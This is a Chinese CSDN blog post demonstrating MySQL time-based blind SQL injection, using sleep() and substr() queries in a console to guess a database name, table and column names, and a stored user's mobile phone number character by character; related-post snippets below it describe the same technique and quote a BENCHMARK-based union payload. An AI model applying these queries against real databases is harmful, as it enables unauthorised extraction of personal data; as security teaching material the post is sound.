mysql基于时间盲注_mysql基于“时间”的盲注

最新推荐文章于 2024-04-30 00:46:24 发布
最新推荐文章于 2024-04-30 00:46:24 发布
阅读量100 收藏
点赞数
文章标签: mysql基于时间盲注
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42494742/article/details/113287723
版权

mysql基于时间的盲注

======================================================================================================================================================================

*猜解库名

-下面是猜解正确

mysql> select sleep(1) from (select database() a_database)a where substr(a_database,1,1)=char(0x66);

+----------+

| sleep(1) |

+----------+

| 0 |

+----------+

1 row in set (1.00 sec)

-下面是猜解错误

mysql> select sleep(1) from (select database() a_database)a where substr(a_database,1,1)=char(0x67);

Empty set (0.00 sec)

*猜解表名

-mysql> select sleep(1) from (select distinct table_name as a_tn from information_schema.tables where table_schema='fangjiangjun' limit 0,1)a where substr(a_tn, 1, 1)='f';

+----------+

| sleep(1) |

+----------+

| 0 |

+----------+

1 row in set (1.00 sec)

-mysql> select sleep(1) from (select distinct table_name as a_tn from information_schema.tables where table_schema='fangjiangjun' limit 0,1)a where substr(a_tn, 1, 1)='x';

Empty set (0.00 sec)

*猜解字段名

-mysql> select sleep(1) from (select distinct column_name as a_cn from information_schema.columns where table_schema='fangjiangjun' and table_name='f_user' limit 0,1)a where substr(a_cn, 1, 1)='i';

+----------+

| sleep(1) |

+----------+

| 0 |

+----------+

1 row in set (1.01 sec)

-mysql> select sleep(1) from (select distinct column_name as a_cn from information_schema.columns where table_schema='fangjiangjun' and table_name='f_user' limit 0,1)a where substr(a_cn, 2, 1)='d';

+----------+

| sleep(1) |

+----------+

| 0 |

+----------+

1 row in set (1.00 sec)

*猜解字段值

-mysql> select sleep(1) from (select convert(mobile_phone,char) as a_mp from fangjiangjun.f_user order by id limit 0,1)a where substr(a_mp,1,1)='1';

+----------+

| sleep(1) |

+----------+

| 0 |

+----------+

1 row in set (1.00 sec)

-mysql> select sleep(1) from (select convert(mobile_phone,char) as a_mp from fangjiangjun.f_user order by id limit 0,1)a where substr(a_mp,2,1)='3';

-mysql> select sleep(1) from (select convert(mobile_phone,char) as a_mp from fangjiangjun.f_user order by id limit 0,1)a where substr(a_mp,2,1)='8';

+----------+

| sleep(1) |

+----------+

| 0 |

+----------+

1 row in set (1.00 sec)

niyoul
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Mysql时间盲注
weixin_43342135的博客
08-28 714
if() 函数: if(1,2,3) 如果条件1为真,执行结果语句2;如果条件1为假,执行结果语句3; sleep() 函数: sleep以秒来算的; length() 函数: 测量字符串的长度 substr() 函数: substr(s,a,b) a为对s截取的位置,b为对s截取的长度 ascii() 函数: ascii(a) 返回a的ascii值 步骤: 首先区别字符型,还是数字型。 1...
mysql 时间盲注_MySQL手注之时间盲注
weixin_39928233的博客
01-19 831
时间盲注(延迟):没有任何回显点 在页面输入任何内容都会返回同一个页面内容的 就可以尝试使用延迟盲注时间盲注常用的函数:if函数: if(Condition,A,B)含义: 如果Condition 成立,执行A,则Bsubstr函数:含义:截取字符串。subster(string, start, length)从string的start位开始截取len个字符ascii函数: ascii(ch...
超硬核,SQL注入之时间盲注,原理+步骤+实战思路
最新发布
2401_84296945的博客
04-30 665
提示:sleep的时间可以自定义,时间太长效率太低、时间太短则不容易判断。
mysql基于时间盲注_基于时间型SQL盲注
weixin_39581739的博客
02-08 228
1 基于时间型SQL盲注注入SQL 代码之后, 存在以下两种情况:如果注入的SQL代码不影响后台[ 数据库] 的正常功能执行, 那么Web 应用的页面显示正确( 原始页面) 。如果注入的SQL 代码影响后台数据库的正常功能( 产生了SQL 注入) , 但是此时Web 应用的页面依旧显示正常( 原因是Web 应用程序采取了“ 重定向" 或“ 屏蔽 ”措施)。产生一个疑问: 注入的SQL 代码到底被后...
mysql基于时间盲注_MYSQL基于时间盲注详解
weixin_30864831的博客
02-08 1170
MYSQL基于时间盲注联合查询,报错注入,以及布尔盲注,都是基于攻击网站会回显消息,或者将错误信息返回在前端,或者会返回web页面的正确或错误但是有时候网站关闭了错误回显或过滤了某些关键字,网页会返回一种状态(status,只要进行了http传输,那么就会有一个状态值),这时候就要用到时间盲注时间盲注的基本函数if(1,2,3):如果1为True,则执行2,否则执行3sleep(x):延迟x秒之...
mysql 时间盲注语句_mysql基于“时间”的盲注
weixin_30183847的博客
02-18 535
无需页面报错,根据页面响应时间做判断!mysql基于时间盲注======================================================================================================================================================================*猜解...
mysql-blind(高级盲注+基于布尔).docx
01-23
盲注主要分为基于时间、布尔和错误的三种类型,本篇将专注于布尔型盲注的详细讲解。 0x01 什么是布尔型盲注 布尔型盲注是通过判断SQL语句执行结果是否影响页面的输出状态来探测注入点是否存在。如果注入的条件为真...
Web应用安全:Mysql盲注.pptx
06-19
5. **基于时间MySQL盲注** - `SLEEP()`:通过`SLEEP()`函数延时查询,根据页面加载时间判断条件是否为真。 - `BENCHMARK()`:执行多次计算密集型操作,增加响应时间,从而判断查询结果。 6. **应对策略** - 对...
Web应用安全:Mysql盲注文本.docx
06-17
盲注主要分为三种类型:基于布尔的SQL盲注、基于时间的SQL盲注和基于报错的SQL盲注。 **一、基于布尔的MySQL盲注** 这种盲注方法依赖于SQL语句执行后的真假判断。常用的逻辑函数包括`left()`, `mid()`和`substr()`...
aleenzz#MYSQL_SQL_BYPASS_WIKI#2-5-我与云锁有个约会1
07-25
以下内容都是把云锁的增强型防护开启简单的布尔盲注生僻函数绕过 这里比较难的点其实也在from,但是比云盾好点,毕竟可以用到注释看到这两条语句其实我们可以清楚的知
mysql 时间盲注_SQL基于时间盲注过程
weixin_39886251的博客
01-27 471
0x00 前言由于要使用到基于时间盲注,但是我觉得基于时间盲注其实就是基于布尔的盲注的升级版,所以我想顺便把基于布尔的盲注分析总结了;首先我觉得基于时间盲注和基于布尔的盲注的最直观的差别就是“参照物”不同,也就是说基于布尔的盲注,其实是可以通过页面的一些变化来进行判断结果!但是有的时候,执行一些sql语句的测试,页面不会有像布尔盲注的时候比较直观的变化,所以这个时候所谓的基于时间盲注,也就...
MYSQL——时间盲注BENCHMARK()
m0_51330619的博客
09-20 3196
先上图看效果 1' union select 1,BENCHMARK(500000000,(select user from users limit 0,1))# 可见benchmark()函数是可以造成延时的。 简介: 它是MySQL的一个内置函数,用于测试函数或者表达式的执行速度。 其运行返回值都是0,仅仅会执行显示时间。 用法:benchmark(重复次数, 执行的函数) 例如:将select database()执行100000000次,显示耗时0.52sec SELECT BENCHMARK(
MySQL延时时间盲注-笔记(手工注入-有图)
qq_38149849的博客
10-03 1221
涉及到MySQL的手工盲注方面。
sql注入(时间盲注脚本,mysql结构)
2401_82760239的博客
04-04 517
print("开始获取数据表", table, "的", column, "字段的第", i + 1, "行记录的长度")print("开始获取数据表", table, "的", column, "字段的第", i + 1, "行记录的内容")print("数据表", table, "第", index, "个字段的长度为", length)print("数据表", table, "第", index, "行数据的长度为", length)print ("目前已知数据库名", database)
渗透系列之mysql时间盲注
Websec
02-23 1716
渗透系列之mysql时间盲注 学习思路点: 如何判断时间盲注 时间盲注函数介绍 Mysq里面延时注入需要使用到的函数为sleep() 一般使用以下语句进行注入判断,if(exp1,exp2,exp3) 含义就是:如果exp1为真,那么执行exp2,否则执行exp3 简单使用延时注入测试数据库的用户长度,poc为: and if(length(user()>1),1,sl...
sql注入知识---时间盲注
尘玥的故事
04-18 588
原理:在SQL注入过程,无论注入是否成功,页面完全没有变化。此时只能通过使用数据库的延时函数来判断注入点一般采用响应时间上的差异来判断是否存在SQL注入,即基于时间型的SQL盲注。第二个语句:语句最后加上and 1=2 形成查询逻辑错误,sleep函数不执行暂停,因此查询时间为0s。第一个语句:sleep函数设置查询停留3s, sleep函数本身返回值为0,显示查询时间为3s。SQL CASE 表达试是一种通用的条件表达试,类似其他语言的 if/else语句。除了Sleep之外的延迟。
【21】WEB安全学习----MySQL注入-6(时间及报错盲注)
尚未佩妥剑 转眼便江湖
09-20 520
目录   基于时间盲注例子: 注入步骤: 确认注入点 猜解数据 报错注入例子: 注入方法 1.floor() 2.extractvalue() 3.updatexml() 基于时间盲注例子: 修改代码,无论传入的参数值是否存在或者是SQL语句运行错误都统一输出hello mysql,因为返回的状态只有一种,无法通过布尔真假进行判断,此时可以用时间延迟进行判断,如果运行了...
Mysql盲注总结
b1ackc4t的博客
01-24 2907
Mysql盲注 当我们无法从显示的页面上直接获取SQL语句的执行结果时,需要进行盲注 手工盲注的基本步骤 判断是否存在注入 字符型还是数值型 猜解当前数据库名 猜解数据库的表名 猜解表的字段名 猜解数据 下面,我们探讨一下常见的三种盲注 基于报错的盲注 利用条件 系统未关闭数据库报错信息,对于一些sql错误直接回显在了错误上 未对报错函数进行过滤 group by key报错 原理 当在一个聚合函数,比如CONUNT函数后面如果使用分组语句就会把查询的一部分以错误的形式显示出来, co
MySQL布尔型高级盲注实战与技巧解析
MySQL盲注是一种高级的Web应用程序安全漏洞,特别是针对那些错误处理机制良好的目标页面。在这种情况下,常规的SQL注入利用方法,如通过UNION查询获取数据字段,可能因为页面无明显回显而变得困难。盲注分为几种类型...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值